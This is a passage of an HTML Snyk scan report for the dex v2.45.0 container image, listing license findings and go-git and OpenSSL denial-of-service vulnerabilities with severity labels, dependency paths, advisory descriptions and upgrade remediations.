<p><a href="https://snyk.io/vuln/snyk:lic:golang:github.com:gosimple:slug:MPL-2.0">More about this vulnerability</a></p>
|
||
</div>
|
||
|
||
</div><!-- .card -->
|
||
<div class="card card--vuln disclosure--not-new severity--medium" data-snyk-test="medium">
|
||
<h2 class="card__title">MPL-2.0 license</h2>
|
||
<div class="card__section">
|
||
|
||
<div class="card__labels">
|
||
<div class="label label--medium">
|
||
<span class="label__text">medium severity</span>
|
||
</div>
|
||
</div>
|
||
|
||
<hr/>
|
||
|
||
<ul class="card__meta">
|
||
<li class="card__meta__item">
|
||
Manifest file: ghcr.io/dexidp/dex:v2.45.0/dexidp/dex <span class="list-paths__item__arrow">›</span> /usr/local/bin/dex
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Package Manager: golang
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Module:
|
||
|
||
github.com/go-sql-driver/mysql
|
||
</li>
|
||
|
||
<li class="card__meta__item">Introduced through:
|
||
|
||
github.com/dexidp/dex@* and github.com/go-sql-driver/mysql@v1.9.3
|
||
|
||
</li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
|
||
<h3 class="card__section__title">Detailed paths</h3>
|
||
|
||
<ul class="card__meta__paths">
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/dexidp/dex@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
github.com/go-sql-driver/mysql@v1.9.3
|
||
|
||
</span>
|
||
|
||
</li>
|
||
</ul><!-- .list-paths -->
|
||
|
||
</div><!-- .card__section -->
|
||
|
||
<hr/>
|
||
<!-- Overview -->
|
||
<p>MPL-2.0 license</p>
|
||
|
||
<hr/>
|
||
|
||
<div class="cta card__cta">
|
||
<p><a href="https://snyk.io/vuln/snyk:lic:golang:github.com:go-sql-driver:mysql:MPL-2.0">More about this vulnerability</a></p>
|
||
</div>
|
||
|
||
</div><!-- .card -->
|
||
<div class="card card--vuln disclosure--not-new severity--medium" data-snyk-test="medium">
|
||
<h2 class="card__title">Improper Validation of Integrity Check Value</h2>
|
||
<div class="card__section">
|
||
|
||
<div class="card__labels">
|
||
<div class="label label--medium">
|
||
<span class="label__text">medium severity</span>
|
||
</div>
|
||
<div class="label label--exploit">
|
||
<span class="label__text">Exploit: Not Defined</span>
|
||
</div>
|
||
</div>
|
||
|
||
<hr/>
|
||
|
||
<ul class="card__meta">
|
||
<li class="card__meta__item">
|
||
Manifest file: ghcr.io/dexidp/dex:v2.45.0/hairyhenderson/gomplate/v5 <span class="list-paths__item__arrow">›</span> /usr/local/bin/gomplate
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Package Manager: golang
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Vulnerable module:
|
||
|
||
github.com/go-git/go-git/v5/storage/filesystem
|
||
</li>
|
||
|
||
<li class="card__meta__item">Introduced through:
|
||
|
||
github.com/hairyhenderson/gomplate/v5@* and github.com/go-git/go-git/v5/storage/filesystem@v5.16.4
|
||
|
||
</li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
|
||
<h3 class="card__section__title">Detailed paths</h3>
|
||
|
||
<ul class="card__meta__paths">
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/hairyhenderson/gomplate/v5@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
github.com/go-git/go-git/v5/storage/filesystem@v5.16.4
|
||
|
||
</span>
|
||
|
||
</li>
|
||
</ul><!-- .list-paths -->
|
||
|
||
</div><!-- .card__section -->
|
||
|
||
<hr/>
|
||
<!-- Overview -->
|
||
<h2 id="overview">Overview</h2>
|
||
<p>Affected versions of this package are vulnerable to Improper Validation of Integrity Check Value for <code>.idx</code> and <code>.pack</code> files. An attacker can cause the application to consume corrupted files, leading to unexpected errors, due to checksums not being checked in the <code>loadIdxFile()</code> function. </p>
|
||
<h2 id="workaround">Workaround</h2>
|
||
<p>This vulnerability can be mitigated by running 'git fsck' from the git CLI to check for data corruption on a given repository.</p>
|
||
<h2 id="remediation">Remediation</h2>
|
||
<p>Upgrade <code>github.com/go-git/go-git/v5/storage/filesystem</code> to version 5.16.5 or higher.</p>
|
||
<h2 id="references">References</h2>
|
||
<ul>
|
||
<li><a href="https://github.com/go-git/go-git/commit/42bdf1f9044e2145acaed6ac4dbf1b8d257da5bd">GitHub Commit</a></li>
|
||
<li><a href="https://github.com/go-git/go-git/releases/tag/v5.16.5">GitHub Release</a></li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
<div class="cta card__cta">
|
||
<p><a href="https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGOGITGOGITV5STORAGEFILESYSTEM-15253024">More about this vulnerability</a></p>
|
||
</div>
|
||
|
||
</div><!-- .card -->
|
||
<div class="card card--vuln disclosure--not-new severity--medium" data-snyk-test="medium">
|
||
<h2 class="card__title">Allocation of Resources Without Limits or Throttling</h2>
|
||
<div class="card__section">
|
||
|
||
<div class="card__labels">
|
||
<div class="label label--medium">
|
||
<span class="label__text">medium severity</span>
|
||
</div>
|
||
<div class="label label--exploit">
|
||
<span class="label__text">Exploit: Not Defined</span>
|
||
</div>
|
||
</div>
|
||
|
||
<hr/>
|
||
|
||
<ul class="card__meta">
|
||
<li class="card__meta__item">
|
||
Manifest file: ghcr.io/dexidp/dex:v2.45.0/hairyhenderson/gomplate/v5 <span class="list-paths__item__arrow">›</span> /usr/local/bin/gomplate
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Package Manager: golang
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Vulnerable module:
|
||
|
||
github.com/go-git/go-git/v5/plumbing/format/index
|
||
</li>
|
||
|
||
<li class="card__meta__item">Introduced through:
|
||
|
||
github.com/hairyhenderson/gomplate/v5@* and github.com/go-git/go-git/v5/plumbing/format/index@v5.16.4
|
||
|
||
</li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
|
||
<h3 class="card__section__title">Detailed paths</h3>
|
||
|
||
<ul class="card__meta__paths">
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/hairyhenderson/gomplate/v5@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
github.com/go-git/go-git/v5/plumbing/format/index@v5.16.4
|
||
|
||
</span>
|
||
|
||
</li>
|
||
</ul><!-- .list-paths -->
|
||
|
||
</div><!-- .card__section -->
|
||
|
||
<hr/>
|
||
<!-- Overview -->
|
||
<h2 id="overview">Overview</h2>
|
||
<p>Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling through the handling of <code>.idx</code> files. An attacker with write access to the local repository's <code>.git</code> directory can exhaust system memory by introducing a maliciously crafted <code>.idx</code> file into the <code>.git</code> directory.</p>
|
||
<h2 id="remediation">Remediation</h2>
|
||
<p>Upgrade <code>github.com/go-git/go-git/v5/plumbing/format/index</code> to version 5.17.1 or higher.</p>
|
||
<h2 id="references">References</h2>
|
||
<ul>
|
||
<li><a href="https://github.com/go-git/go-git/security/advisories/GHSA-jhf3-xxhw-2wpp">GitHub Advisory</a></li>
|
||
<li><a href="https://github.com/go-git/go-git/commit/3ec0d70cb687ae1da5f4d18faa4229bd971a8710">GitHub Commit</a></li>
|
||
<li><a href="https://github.com/go-git/go-git/commit/6b38a326816b80f64c20cc0e6113958b65c05a1c">GitHub Commit</a></li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
<div class="cta card__cta">
|
||
<p><a href="https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGOGITGOGITV5PLUMBINGFORMATINDEX-15855220">More about this vulnerability</a></p>
|
||
</div>
|
||
|
||
</div><!-- .card -->
|
||
<div class="card card--vuln disclosure--not-new severity--medium" data-snyk-test="medium">
|
||
<h2 class="card__title">Improper Validation of Array Index</h2>
|
||
<div class="card__section">
|
||
|
||
<div class="card__labels">
|
||
<div class="label label--medium">
|
||
<span class="label__text">medium severity</span>
|
||
</div>
|
||
<div class="label label--exploit">
|
||
<span class="label__text">Exploit: Not Defined</span>
|
||
</div>
|
||
</div>
|
||
|
||
<hr/>
|
||
|
||
<ul class="card__meta">
|
||
<li class="card__meta__item">
|
||
Manifest file: ghcr.io/dexidp/dex:v2.45.0/hairyhenderson/gomplate/v5 <span class="list-paths__item__arrow">›</span> /usr/local/bin/gomplate
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Package Manager: golang
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Vulnerable module:
|
||
|
||
github.com/go-git/go-git/v5/plumbing/format/index
|
||
</li>
|
||
|
||
<li class="card__meta__item">Introduced through:
|
||
|
||
github.com/hairyhenderson/gomplate/v5@* and github.com/go-git/go-git/v5/plumbing/format/index@v5.16.4
|
||
|
||
</li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
|
||
<h3 class="card__section__title">Detailed paths</h3>
|
||
|
||
<ul class="card__meta__paths">
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
github.com/hairyhenderson/gomplate/v5@*
|
||
<span class="list-paths__item__arrow">›</span>
|
||
github.com/go-git/go-git/v5/plumbing/format/index@v5.16.4
|
||
|
||
</span>
|
||
|
||
</li>
|
||
</ul><!-- .list-paths -->
|
||
|
||
</div><!-- .card__section -->
|
||
|
||
<hr/>
|
||
<!-- Overview -->
|
||
<h2 id="overview">Overview</h2>
|
||
<p>Affected versions of this package are vulnerable to Improper Validation of Array Index through improper validation in the index decoding for version 4 files. An attacker with write access to the <code>.git</code> directory to modify or inject the index file can cause a panic and terminate the process by supplying a maliciously crafted <code>.git/index</code> file that triggers an out-of-bounds slice operation during index parsing.</p>
|
||
<h2 id="remediation">Remediation</h2>
|
||
<p>Upgrade <code>github.com/go-git/go-git/v5/plumbing/format/index</code> to version 5.17.1 or higher.</p>
|
||
<h2 id="references">References</h2>
|
||
<ul>
|
||
<li><a href="https://github.com/go-git/go-git/security/advisories/GHSA-gm2x-2g9h-ccm8">GitHub Advisory</a></li>
|
||
<li><a href="https://github.com/go-git/go-git/commit/e9b65df44cb97faeba148b47523a362beaecddf9">GitHub Commit</a></li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
<div class="cta card__cta">
|
||
<p><a href="https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMGOGITGOGITV5PLUMBINGFORMATINDEX-15855246">More about this vulnerability</a></p>
|
||
</div>
|
||
|
||
</div><!-- .card -->
|
||
<div class="card card--vuln disclosure--not-new severity--low" data-snyk-test="low">
|
||
<h2 class="card__title">CVE-2026-28390</h2>
|
||
<div class="card__section">
|
||
|
||
<div class="card__labels">
|
||
<div class="label label--low">
|
||
<span class="label__text">low severity</span>
|
||
</div>
|
||
<div class="label label--exploit">
|
||
<span class="label__text">Exploit: Not Defined</span>
|
||
</div>
|
||
</div>
|
||
|
||
<hr/>
|
||
|
||
<ul class="card__meta">
|
||
<li class="card__meta__item">
|
||
Package Manager: alpine:3.23
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Vulnerable module:
|
||
|
||
openssl/libcrypto3
|
||
</li>
|
||
|
||
<li class="card__meta__item">Introduced through:
|
||
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0 and openssl/libcrypto3@3.5.5-r0
|
||
|
||
</li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
|
||
<h3 class="card__section__title">Detailed paths</h3>
|
||
|
||
<ul class="card__meta__paths">
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libcrypto3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
busybox/ssl_client@1.37.0-r30
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libcrypto3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/apk-tools@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/libapk@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libcrypto3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/apk-tools@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/libapk@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libssl3@3.5.5-r0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libcrypto3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libssl3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
busybox/ssl_client@1.37.0-r30
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libssl3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/apk-tools@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/libapk@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libssl3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
</ul><!-- .list-paths -->
|
||
|
||
</div><!-- .card__section -->
|
||
|
||
<hr/>
|
||
<!-- Overview -->
|
||
<h2 id="nvd-description">NVD Description</h2>
|
||
<p><strong><em>Note:</em></strong> <em>Versions mentioned in the description apply only to the upstream <code>openssl</code> package and not the <code>openssl</code> package as distributed by <code>Alpine</code>.</em>
|
||
<em>See <code>How to fix?</code> for <code>Alpine:3.23</code> relevant fixed versions and status.</em></p>
|
||
<p>Issue summary: During processing of a crafted CMS EnvelopedData message
|
||
with KeyTransportRecipientInfo a NULL pointer dereference can happen.</p>
|
||
<p>Impact summary: Applications that process attacker-controlled CMS data may
|
||
crash before authentication or cryptographic operations occur resulting in
|
||
Denial of Service.</p>
|
||
<p>When a CMS EnvelopedData message that uses KeyTransportRecipientInfo with
|
||
RSA-OAEP encryption is processed, the optional parameters field of
|
||
RSA-OAEP SourceFunc algorithm identifier is examined without checking
|
||
for its presence. This results in a NULL pointer dereference if the field
|
||
is missing.</p>
|
||
<p>Applications and services that call CMS_decrypt() on untrusted input
|
||
(e.g., S/MIME processing or CMS-based protocols) are vulnerable.</p>
|
||
<p>The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this
|
||
issue, as the affected code is outside the OpenSSL FIPS module boundary.</p>
|
||
<h2 id="remediation">Remediation</h2>
|
||
<p>Upgrade <code>Alpine:3.23</code> <code>openssl</code> to version 3.5.6-r0 or higher.</p>
|
||
<h2 id="references">References</h2>
|
||
<ul>
|
||
<li><a href="https://github.com/openssl/openssl/commit/01194a8f1941115cd0383bfa91c736dd3993c8bc">https://github.com/openssl/openssl/commit/01194a8f1941115cd0383bfa91c736dd3993c8bc</a></li>
|
||
<li><a href="https://github.com/openssl/openssl/commit/2e39b7a6993be445fddb9fbce316fa756e0397b6">https://github.com/openssl/openssl/commit/2e39b7a6993be445fddb9fbce316fa756e0397b6</a></li>
|
||
<li><a href="https://github.com/openssl/openssl/commit/af2a5fecd3e71a29e7568f9c1453dec5cebbaff4">https://github.com/openssl/openssl/commit/af2a5fecd3e71a29e7568f9c1453dec5cebbaff4</a></li>
|
||
<li><a href="https://github.com/openssl/openssl/commit/ea7b4ea4f9f853521ba34830cbcadc970d2e0788">https://github.com/openssl/openssl/commit/ea7b4ea4f9f853521ba34830cbcadc970d2e0788</a></li>
|
||
<li><a href="https://github.com/openssl/openssl/commit/fd2f1a6cf53b9ceeca723a001aa4b825d7c7ee75">https://github.com/openssl/openssl/commit/fd2f1a6cf53b9ceeca723a001aa4b825d7c7ee75</a></li>
|
||
<li><a href="https://openssl-library.org/news/secadv/20260407.txt">https://openssl-library.org/news/secadv/20260407.txt</a></li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
<div class="cta card__cta">
|
||
<p><a href="https://snyk.io/vuln/SNYK-ALPINE323-OPENSSL-15993253">More about this vulnerability</a></p>
|
||
</div>
|
||
|
||
</div><!-- .card -->
|
||
<div class="card card--vuln disclosure--not-new severity--low" data-snyk-test="low">
|
||
<h2 class="card__title">CVE-2026-28388</h2>
|
||
<div class="card__section">
|
||
|
||
<div class="card__labels">
|
||
<div class="label label--low">
|
||
<span class="label__text">low severity</span>
|
||
</div>
|
||
<div class="label label--exploit">
|
||
<span class="label__text">Exploit: Not Defined</span>
|
||
</div>
|
||
</div>
|
||
|
||
<hr/>
|
||
|
||
<ul class="card__meta">
|
||
<li class="card__meta__item">
|
||
Package Manager: alpine:3.23
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Vulnerable module:
|
||
|
||
openssl/libcrypto3
|
||
</li>
|
||
|
||
<li class="card__meta__item">Introduced through:
|
||
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0 and openssl/libcrypto3@3.5.5-r0
|
||
|
||
</li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
|
||
<h3 class="card__section__title">Detailed paths</h3>
|
||
|
||
<ul class="card__meta__paths">
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libcrypto3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
busybox/ssl_client@1.37.0-r30
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libcrypto3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/apk-tools@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/libapk@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libcrypto3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/apk-tools@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/libapk@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libssl3@3.5.5-r0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libcrypto3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libssl3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
busybox/ssl_client@1.37.0-r30
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libssl3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/apk-tools@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/libapk@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libssl3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
</ul><!-- .list-paths -->
|
||
|
||
</div><!-- .card__section -->
|
||
|
||
<hr/>
|
||
<!-- Overview -->
|
||
<h2 id="nvd-description">NVD Description</h2>
|
||
<p><strong><em>Note:</em></strong> <em>Versions mentioned in the description apply only to the upstream <code>openssl</code> package and not the <code>openssl</code> package as distributed by <code>Alpine</code>.</em>
|
||
<em>See <code>How to fix?</code> for <code>Alpine:3.23</code> relevant fixed versions and status.</em></p>
|
||
<p>Issue summary: When a delta CRL that contains a Delta CRL Indicator extension
|
||
is processed a NULL pointer dereference might happen if the required CRL
|
||
Number extension is missing.</p>
|
||
<p>Impact summary: A NULL pointer dereference can trigger a crash which
|
||
leads to a Denial of Service for an application.</p>
|
||
<p>When CRL processing and delta CRL processing is enabled during X.509
|
||
certificate verification, the delta CRL processing does not check
|
||
whether the CRL Number extension is NULL before dereferencing it.
|
||
When a malformed delta CRL file is being processed, this parameter
|
||
can be NULL, causing a NULL pointer dereference.</p>
|
||
<p>Exploiting this issue requires the X509_V_FLAG_USE_DELTAS flag to be enabled in
|
||
the verification context, the certificate being verified to contain a
|
||
freshestCRL extension or the base CRL to have the EXFLAG_FRESHEST flag set, and
|
||
an attacker to provide a malformed CRL to an application that processes it.</p>
|
||
<p>The vulnerability is limited to Denial of Service and cannot be escalated to
|
||
achieve code execution or memory disclosure. For that reason the issue was
|
||
assessed as Low severity according to our Security Policy.</p>
|
||
<p>The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue,
|
||
as the affected code is outside the OpenSSL FIPS module boundary.</p>
|
||
<h2 id="remediation">Remediation</h2>
|
||
<p>Upgrade <code>Alpine:3.23</code> <code>openssl</code> to version 3.5.6-r0 or higher.</p>
|
||
<h2 id="references">References</h2>
|
||
<ul>
|
||
<li><a href="https://github.com/openssl/openssl/commit/59c3b3158553ab53275bbbccca5cb305d591cf2e">https://github.com/openssl/openssl/commit/59c3b3158553ab53275bbbccca5cb305d591cf2e</a></li>
|
||
<li><a href="https://github.com/openssl/openssl/commit/5a0b4930779cd2408880979db765db919da55139">https://github.com/openssl/openssl/commit/5a0b4930779cd2408880979db765db919da55139</a></li>
|
||
<li><a href="https://github.com/openssl/openssl/commit/602542f2c0c2d5edb47128f93eac10b62aeeefb3">https://github.com/openssl/openssl/commit/602542f2c0c2d5edb47128f93eac10b62aeeefb3</a></li>
|
||
<li><a href="https://github.com/openssl/openssl/commit/a9d187dd1000130100fa7ab915f8513532cb3bb8">https://github.com/openssl/openssl/commit/a9d187dd1000130100fa7ab915f8513532cb3bb8</a></li>
|
||
<li><a href="https://github.com/openssl/openssl/commit/d3a901e8d9f021f3e67d6cfbc12e768129862726">https://github.com/openssl/openssl/commit/d3a901e8d9f021f3e67d6cfbc12e768129862726</a></li>
|
||
<li><a href="https://openssl-library.org/news/secadv/20260407.txt">https://openssl-library.org/news/secadv/20260407.txt</a></li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
<div class="cta card__cta">
|
||
<p><a href="https://snyk.io/vuln/SNYK-ALPINE323-OPENSSL-15993258">More about this vulnerability</a></p>
|
||
</div>
|
||
|
||
</div><!-- .card -->
|
||
<div class="card card--vuln disclosure--not-new severity--low" data-snyk-test="low">
|
||
<h2 class="card__title">CVE-2026-28389</h2>
|
||
<div class="card__section">
|
||
|
||
<div class="card__labels">
|
||
<div class="label label--low">
|
||
<span class="label__text">low severity</span>
|
||
</div>
|
||
<div class="label label--exploit">
|
||
<span class="label__text">Exploit: Not Defined</span>
|
||
</div>
|
||
</div>
|
||
|
||
<hr/>
|
||
|
||
<ul class="card__meta">
|
||
<li class="card__meta__item">
|
||
Package Manager: alpine:3.23
|
||
</li>
|
||
<li class="card__meta__item">
|
||
Vulnerable module:
|
||
|
||
openssl/libcrypto3
|
||
</li>
|
||
|
||
<li class="card__meta__item">Introduced through:
|
||
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0 and openssl/libcrypto3@3.5.5-r0
|
||
|
||
</li>
|
||
</ul>
|
||
|
||
<hr/>
|
||
|
||
|
||
<h3 class="card__section__title">Detailed paths</h3>
|
||
|
||
<ul class="card__meta__paths">
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libcrypto3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
busybox/ssl_client@1.37.0-r30
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libcrypto3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/apk-tools@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/libapk@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libcrypto3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/apk-tools@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/libapk@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libssl3@3.5.5-r0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libcrypto3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libssl3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
busybox/ssl_client@1.37.0-r30
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libssl3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
<li>
|
||
<span class="list-paths__item__introduced"><em>Introduced through</em>:
|
||
docker-image|ghcr.io/dexidp/dex@v2.45.0
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/apk-tools@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
apk-tools/libapk@3.0.3-r1
|
||
<span class="list-paths__item__arrow">›</span>
|
||
openssl/libssl3@3.5.5-r0
|
||
|
||
</span>
|
||
|
||
</li>
|
||
</ul><!-- .list-paths -->
|
||
|
||
</div><!-- .card__section -->
|
||
|
||
<hr/>
|
||
<!-- Overview -->
|
||
<h2 id="nvd-description">NVD Description</h2>
|
||
<p><strong><em>Note:</em></strong> <em>Versions mentioned in the description apply only to the upstream <code>openssl</code> package and not the <code>openssl</code> package as distributed by <code>Alpine</code>.</em>
|
||
<em>See <code>How to fix?</code> for <code>Alpine:3.23</code> relevant fixed versions and status.</em></p>
|
||
<p>Issue summary: During processing of a crafted CMS EnvelopedData message
|
||
with KeyAgreeRecipientInfo a NULL pointer dereference can happen.</p>
|
||
<p>Impact summary: Applications that process attacker-controlled CMS data may
|
||
crash before authentication or cryptographic operations occur resulting in
|
||
Denial of Service.</p>
|
||
<p>When a CMS EnvelopedData message that uses KeyAgreeRecipientInfo is
|
||
processed, the optional parameters field of KeyEncryptionAlgorithmIdentifier
|
||
is examined without checking for its presence. This results in a NULL
|
||
pointer dereference if the field is missing.</p>
|
||
<p>Applications and services that call CMS_decrypt() on untrusted input
|
||
(e.g., S/MIME processing or CMS-based protocols) are vulnerable.</p>
|
||
<p>The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this
|
||
issue, as the affected code is outside the OpenSSL FIPS module boundary.</p>
|
||
<h2 id="remediation">Remediation</h2>
|
||
<p>Upgrade <code>Alpine:3.23</code> <code>openssl</code> to version 3.5.6-r0 or higher.</p>
|
||
<h2 id="references">References</h2>
|
||
<ul>
|
||
<li><a href="https://github.com/openssl/openssl/commit/16cea4188e0ea567deb4f93f85902247e67384f5">https://github.com/openssl/openssl/commit/16cea4188e0ea567deb4f93f85902247e67384f5</a></li>
|
||
